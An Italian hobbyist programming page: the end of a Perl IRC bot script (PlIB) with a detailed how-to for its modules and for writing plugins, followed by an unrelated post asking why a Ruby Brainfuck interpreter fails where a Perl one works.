# @licence..........................................GNU/GPL 3 #

# @lang..................................................Perl #

# @requirements...IO::Socket::INET or IO::Socket::SSL for SSL #

# @isthisfinished.........................................yes #

#                            Enjoy                            #

###############################################################

use strict;

use warnings;

use Plib::main;

# Usage: new (nick, user, real, idpass, isop, debug, usessl, server, port)

# !! WARNING !! Use class->setChans (chan1:key, chan2:key, chan3, chan4, ecc.) to add chans to join !!

my $plib = Plib::main->new ("Plib", "plib", "PerL IrcBot", "", 0, 1, 1, "irc.unitx.net", 6697);

$plib->setChans ("#Unit-X");

### ↓↓↓↓↓ OPTIONAL MODULES ↓↓↓↓↓                                     ###

#   Usage: $mainclass->hook_modules (module1, module2, module3 ecc.) ###

$plib->hook_modules ("firstplugin", "dml", "autorejoin");

#

$plib->startAll;

Download: http://github.com/Robertof/PlIB/tarball/master (tar.gz)
Github: http://github.com/Robertof/PlIB
Sono inclusi alcuni moduli predefiniti, come l'autorejoin, il dynamic plugin loader (mi raccomando di impostarlo!), il plugin per UnitX ecc.
Infine, ho appena finito di scrivere una megaguida per chi volesse approfondire PlIB, con annessa guida per la creazione di moduli.
Eccola qui:

Codice:

PlIB -- HowTo

Italian:

Ciao mondo!

PlIB è un ircbot modulare, rfc compliant con numerose features. Una di queste è, ad esempio, il supporto ad SSL :)

Ma resta a voi scoprirle tutte, con questo grande manuale!

Cominciamo a spiegare come è composto PlIB.

PlIB è formato da 3 moduli principali: main, sockutil e functions.

Il primo, main, è il modulo principale.

Le sue funzioni sono:

- new ~ il costruttore. Parametri:

-- nickname, username, realname

-- idpass (identify pass)

-- isOp (il bot sarà operatore nei canali? NB: questa funzione non serve a nulla nelle classi predefinite del bot, ma potrebbe servire ad un eventuale plugin)

-- debug (il bot deve abilitare il debug? Con il debug avrete alcuni messaggi speciali, e sarà visualizzato ciò che il server invia)

-- usessl (il bot dovrà usare SSL? Attenzione, è necessario il modulo IO::Socket::SSL per l'SSL!)

-- server (a quale server il bot dovrà connettersi?)

-- port (che porta?)

~~~~~~~~~~~~~~~~~~~

- setChans ~ questa funzione serve per impostare i chans del bot. Attenzione: è obbligatorio usare questa funzione prima di avviare il bot con startAll! Parametri:

-- canale1 (canale)

-- canale2:chiave (un canale con annessa chiave)

-- canale3 (un altro canale senza chiave)

-- ecc. (si possono aggiungere infiniti canali)

~~~~~~~~~~~~~~~~~~~

- isDebug ~ funzione interna - restituisce 1 o 0 in base all'opzione "debug" inserita nel costruttore.

~~~~~~~~~~~~~~~~~~~

- hook_modules ~ questa funzione serve per "hookare" un modulo. Un modulo può contenere qualsiasi cosa, dalla possibilità di ricercare da un motore di ricerca alla possibilità di implementare persino un'intelligenza artificiale (sì, ok, giusto per dire!). Parametri:

-- modulo1

-- modulo2

-- ecc. (si possono aggiungere infiniti moduli, nei limiti della memoria ovviamente!)

~~~~~~~~~~~~~~~~~~~

- getAllChannels ~ questa funzione ritorna la lista dei canali joinati [quelli specificati con setChans], con un separatore a scelta. Parametri:

-- chanSeparator (il separatore per ciascun chan, per esempio ',' produrra' #ciao,#mondo,#bello ecc.)

-- withKey (nel risultato sarà restituita anche la key?)

-- keySeparator (se è stato specificato withKey, questo sarà il separatore della chiave del canale. Per esempio, se inserisco ':', produrrà: #ciao:bello,#mondo:0,#bello:cavolo; ATTENZIONE allo 0 finale, che viene inserito quando un canale non ha la chiave!

~~~~~~~~~~~~~~~~~~~

- sendMsg ~ questa funzione invia un messaggio, ma solo se è stato aperto il socket (quindi se è stata lanciata la funzione startAll) - Parametri:

-- to (destinazione del messaggio, puo' essere anche un username)

-- what (cosa deve inviare PlIB?)

~~~~~~~~~~~~~~~~~~~

- matchMsg ~ questa funzione matcha un messaggio, e ritorna un hash reference (ovvero da usare come $x->{'elemento'}) formato da 3 elementi: userinfo (le informazioni dell'utente in formato :nick!ident@host, inutile se usato con un plugin, poiché alla funzione 'onWhile' del plugin vengono passate le variabili 'nick, 'ident' e 'host'), chan (il canale dove è stato inviato il messaggio), message (il messaggio). Parametri:

-- onWhat (su cosa deve matchare il messaggio? Dev'essere una riga mandata dal server)

~~~~~~~~~~~~~~~~~~~

- getUserData ~ questa funzione matcha le informazioni di un utente, in formato :nick!ident@host, e restituisce un hash reference formato da 3 elementi: nick (il nick dell'utente), ident (l'ident dell'utente), host (l'host dell'utente). Questa funzione è utile solo nel caso si abbiano delle informazioni non parsate automaticamente da PlIB (quindi non nel caso dell'onWhile dei plugin). Parametri:

-- onWhat (su cosa deve matchare i dati dell'utente? Dev'essere una riga mandata dal server)

~~~~~~~~~~~~~~~~~~~

- startAll ~ questa funzione apre il socket, ed avvia la ricezione dei dati da esso. Necessaria per far connettere il bot. Attenzione: avviare questa funzione solo DOPO aver hookato i plugin & aver impostato i chan.

Queste sono le funzioni del modulo principale. Ma ora passiamo a sockutil. Sockutil è il modulo che fornisce alcuni utili funzioni per il socket. È possibile accedere a questo modulo grazie al main, che metterà a disposizione nel mainhash l'attributo "socket", in modo da poterci accedere tramite $mainClass->{"socket"}->funzioniSockUtil. NOTA: questa classe non dev'essere inizializzata dall'utente, ma dalla main di PlIB!! Verrà fatto automaticamente dal metodo 'startAll'. Rendo comunque disponibili i parametri della 'new' per chi fosse interessato in generale.

Ma passiamo alle sue funzioni.

- new ~ il costruttore. Nota che la connessione sarà inizializzata in seguito grazie ad un'altra funzione, non con il costruttore. Parametri:

-- sockaddr (l'indirizzo a cui connettersi)

-- sockport (la porta)

-- isSSL (usare SSL o no?)

-- mainHash (l'hash principale, ovvero l'istanza della classe 'main')

~~~~~~~~~~~~~~~~~~~

- startConnection ~ questa funzione avvierà la connessione. Si occuperà anche di notificare all'utente eventuali errori di moduli (come per esempio la mancata installazione del socket). Anche questa funzione è ad uso interno, ad opera della funzione 'startAll' della classe main.

~~~~~~~~~~~~~~~~~~~

- send ~ questa funzione serve per inviare un determinato comando al server. È possibile usarla da qualsiasi parte, tramite $mainClass->{"socket"}->send ("xx"). Parametri:

-- what (cosa inviare al socket? ATTENZIONE: NON OMETTERE IL \N!)

~~~~~~~~~~~~~~~~~~~

- closeConnection ~ questa funzione invia il messaggio di QUIT al server, chiude il socket ed elimina la variabile. Parametri:

-- quitMessage: il messaggio di quit.

~~~~~~~~~~~~~~~~~~~

- getSock ~ questa funzione restituisce il socket. Non serve a molto per un uso normale, ma potrebbe essere utile per altri scopi.

Ma ora passiamo al modulo functions.

Anche esso viene inizializzato automaticamente dalla classe principale, e viene reso accessibile grazie alla proprietà dell'hash functions.

Ma passiamo alle sue funzioni.

- new ~ il costruttore. Nessun parametro

~~~~~~~~~~~~~~~~~~~

- checkVars ~ questa funzione controlla se una variabile è definita o no. Ritorna 1 se tutte le variabili sono definite, 0 se viceversa. Parametri:

-- $variabile (una variabile),

-- $variabiledue (un'altra variabile),

-- ecc. (questa funzione accetta infiniti parametri)

~~~~~~~~~~~~~~~~~~~

- hashJoin ~ questa funzione è molto utile, e funge come 'join' ma per gli hash. Funziona solo con gli hash references. Parametri:

-- kvsep (il separatore tra chiave e valore. Per esempio, con => e con un hash del tipo '{ciao => "mondo"}', il risultato sarà ciao => mondo).

-- valsep (il separatore tra un valore. Per esempio, con , come valsep e con => come kvsep, con un hash del tipo '{mondo => "bello", dicosulserio => "si"}', il risultato sarà: mondo => bello, dicosulserio => si)

-- onlyVals (questa variabile puo' essere 0 o 1, indica se visualizzare solo i valori e non le chiavi)

-- onlyKeys (questa variabile pou' essere 0 o 1, indica se visualizzare solo le chiavi e non i valori)

-- hash (l'hash reference)

~~~~~~~~~~~~~~~~~~~

- preg_quote ~ questa funzione è basata sulla regex creata dal sito phpjs.org, e serve per fare l'escape di caratteri speciali riservati alle regex. Parametri:

-- str (la stringa da escapare)

~~~~~~~~~~~~~~~~~~~

- matchServerNumeric ~ questa funzione serve per matchare il numeric di un server, ovvero una risposta numerica del server. Nota che questa funzione non mostrerà il valore restituito dal server, ma solo 0 o 1 a seconda del match. Parametri:

-- rcnick (alias di regex compatible nick, ovvero il nick 'trattato' con preg_quote)

-- rcserver (lo stesso di prima, ma con il server)

-- numeric (numeric da matchare)

-- onWhat (su cosa matchare; dev'essere una risposta del server)

~~~~~~~~~~~~~~~~~~~

- trim ~ questa funzione serve per eliminare caratteri inutili da una stringa. Eliminerà gli \n, i \r, i \r\n e gli \s dall'inizio e dalla fine di una stringa. Utile per usare risposte del server.

-- str (stringa da 'trimmare')

Finalmente siamo giunti alla fine delle classi principali. Prima di introdurre i moduli, questo è l'usage del bot:

use Plib::main;

my $plib = Plib::main->new ("nick", "ident", "real", "idpass", op, debug, ssl, "server, "port");

$plib->setChans ("#canale1", "#canale2", "#canale3:chiave");

$plib->hook_modules ("modulo1", "modulo2");

$plib->startAll;

Dettagli sui vari parametri li trovate all'inizio.

Ed ora passiamo ai moduli. Un modulo è uno script Perl usato per aggiungere funzionalità al bot. Il modulo deve essere nella cartella "Plib/modules/" ed estensione "pm" (perl module).

Creare un modulo è molto semplice. Un esempio è il modulo predefinito "firstplugin".

Ma vediamo come farne uno da 0! :)

Innanzitutto, aggiungiamo il solito "#!/usr/bin/perl" (o il proprio path a Perl) nella prima riga del file.

Poi, aggiungiamo sotto questo:

package Plib::modules::nomemodulo;

In pratica questa riga serve per dire a Perl che questo è un modulo che fa parte di "Plib::modules". Il "nomemodulo" deve avere lo stesso nome del file del modulo, e non deve avere spazi.

Sotto alla linea package, è possibile includere qualsiasi altro modulo Perl, a seconda delle proprie esigenze (come per esempio IO::Socket, per dirne una).

Passiamo ora a crare la funzione costruttrice: new.

Innanzitutto, se non dobbiamo far configurare nulla all'utente in questo plugin, possiamo tranquillamente fare:

sub new { return $_[0]; }

Ovvero, quando verrà chiamato il main, verrà restituita l'istanza della classe con le sole funzioni, e nessuna variabile.

Se invece dobbiamo far configurare qualcosa all'utente, semplicemente facciamo una cosa del genere:

sub new {

    my $opzione = "giallo";

    my $coloremutande = "verde";

    ## FINE CONFIGURAZIONE !! ##

    my $options = { "opzione" => $opzione, "coloremutande" => $coloremutande };

    bless $options, $_[0];

    return $options;

}

Questo snippet sembra complesso, ma in realta' e' molto semplice. Innanzitutto come potrete notare le opzioni sono nella funzione stessa, precedute da "my" e con il valore tra virgolette.

Una volta finita la configurazione, creiamo una hash reference con le chiavi pari a quelle del nome delle variabili, e il valore con quello delle variabili. Ovviamente è possibile specificare anche nomi diversi delle chiavi. Una volta fatto, lanciamo la funzione "bless" con due argomenti. Questa funzione serve per rendere un oggetto parte del package. Quindi, in questo caso, si rende l'hash "options" parte del package "nomemodulo". Infatti, $_[0] significa "il primo parametro", ovvero il nome del package. Per finire, ritorniamo il nuovo $options, che equivale a ritornare l'istanza della classe.

Adesso passiamo a definire le funzioni che saranno usate da PlIB: atInit e atWhile.

atInit è la funzione che viene richiamata quando il server invia il messaggio di fine motd / motd non presente, e dopo il join/identify. Quindi per esempio, con questa funzione è possibile stampare un hello world su tutti i canali. I parametri che vengono passati sono "isTest" e "botClass". isTest è una variabile che viene passata per fare un test, ovvero per verificare se la funzione esiste e si esegue correttamente o no. Dopo vedremo cosa farcene. Poi viene passato "botClass", ovvero la classe principale del bot.

Ecco un semplice esempio che stampa un "Hello world!" su tutti i chan joinati.

sub atInit {

    my ($self, $isTest, $botClass) = @_; # Da notare che come primo parametro viene passato 'self', ovvero l'istanza della classe principale (nomeplugin in questo caso)

    return 1 if $isTest; # Se e' un test, ritorniamo uno. Possiamo ritornare anche 0, 5, 324535 o quello che vogliamo. In questo modo fermiamo l'esecuzione della funzione.

    $botClass->sendMsg ($botClass->getAllChannels (",", 0), "Hello world!"); # La funzione vera e propria, che invia un messaggio a tutti i chan separati da una virgola con il contenuto "Hello world!". Semplice, vero? :P

}

Ecco qui la funzione, ampliamente commentata.

Adesso passiamo all'ultimo argomento di questa guida, ovvero la funzione 'atWhile', che viene eseguita ogni volta che il server invia qualcosa.

I parametri che vengono passati sono isTest (che abbiamo già visto prima), botClass (la classe principale, ovvero main), sent (cosa ha inviato il server), nick (il nick dell'utente, se presente, che ha fatto un azione), ident (l'ident dell'utente, sempre se presente), host (l'hostmask dell'utente, se presente ovviamente).

Vediamo un esempio che registra il comando "!ciao" che outputta "Ciao mondo!"..

sub atWhile {

    my ($self, $isTest, $botClass, $sent, $nick, $ident, $host) = @_;

    return 1 if $isTest;

    my $info; # Comincio a registrare questa variabile che conterra' l'hashref ritornato da matchMsg (i dettagli stanno all'inizio!)

    if ($nick and $ident and $host and $info = $botClass->matchMsg ($sent) and $info->{"message"} =~ /^!ciao/i) { # Niente paura! Non è niente di difficile. Innanzitutto controlliamo se $nick, $ident e $host sono dichiarati. Poi controlliamo se quello che è stato inviato è un messaggio, in caso positivo assegnamo l'hashref generato da matchMsg. Infine controlliamo se il message matcha !ciao. Il ^ iniziale è per evitare che matchi anche frasi come ciao, hai visto il comando !ciao ?, mentre il /i finale serve per rendere case insensitive, ovvero per farlo funzionare sia con !cIao sia con !CiAo sia con qualsiasi altra cosa.

        $botClass->sendMsg ($info->{"chan"}, "Ciao mondo!"); # Inviamo il messaggio al chan dove è stato inviato il messaggio principale

    }

}

1;

Da notare l'uno finale, mi raccomando di inserirlo sempre, altrimenti il vostro plugin darà un errore!

Questo è tutto. In fondo, non è così complicato, o sbaglio? Buon divertimento, con la vostra copia di PlIB!

Robertof.

robertof [at] anche {Dot} no

Enjoy

[Ruby] Brainfuck interpreter.

Fri, 16 Jul 2010 23:02:22 +0200

Buongiorno, ogni tanto posto anche qui.

Vabbe' che su Google se ne trovano a non finire, pero' mi incuriosisce il fatto che, nonostante i due script siano quasi identici (se non per alcune modifiche per via di Ruby), le esecuzioni producono risultati differenti.

Questo e' lo script Perl: http://sprunge.us/jJjU
Questo e' lo script Ruby: http://sprunge.us/XFcB

Lo script Perl funziona che e' una meraviglia (codice Brainfuck):

Codice:

sh$ perl main.pl source

Hello World!

Lo script Ruby fa cagare che e' una meraviglia:

Codice:

sh$ ruby main.rb source

        



Molto probabilmente e' una cazzata, ma sono alle prime armi con Ruby...

Grazie in anticipo. ^_^